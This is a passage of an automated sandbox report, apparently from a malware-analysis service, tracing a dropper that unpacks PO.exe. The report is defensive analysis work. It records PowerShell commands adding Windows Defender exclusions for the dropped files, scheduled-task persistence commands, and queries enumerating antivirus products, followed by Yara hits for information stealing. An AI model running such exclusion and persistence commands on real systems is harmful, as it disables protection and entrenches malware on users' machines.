                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AJzHYZtQIb" /XML "C:\Users\user\AppData\Local\Temp\tmp61B0.tmp"Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AJzHYZtQIb" /XML "C:\Users\user\AppData\Local\Temp\tmp8574.tmp"
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess created: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe "C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe"
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeCode function: 0_2_0018D05E cpuid 0_2_0018D05E
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_00186CF5
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeQueries volume information: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeQueries volume information: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeQueries volume information: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeQueries volume information: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeCode function: 0_2_0018B2FE GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,MapViewOfFile,UnmapViewOfFile,CloseHandle,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,0_2_0018B2FE
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeCode function: 0_2_00175032 GetVersionExW,0_2_00175032
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: PO.exe, 0000000E.00000002.2275317622.00000000013F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Source: Yara matchFile source: 7.2.PO.exe.3c18d70.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.PO.exe.3c00f50.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.PO.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.PO.exe.3c18d70.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.PO.exe.3c00f50.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000E.00000002.2274416687.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000015.00000002.2357626482.0000000002FF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.2247047739.0000000004AFD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2160567285.000000000453C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2276292357.00000000031D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2160567285.0000000003C00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: PO.exe PID: 7532, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: PO.exe PID: 8068, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: AJzHYZtQIb.exe PID: 8164, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: AJzHYZtQIb.exe PID: 5404, type: MEMORYSTR
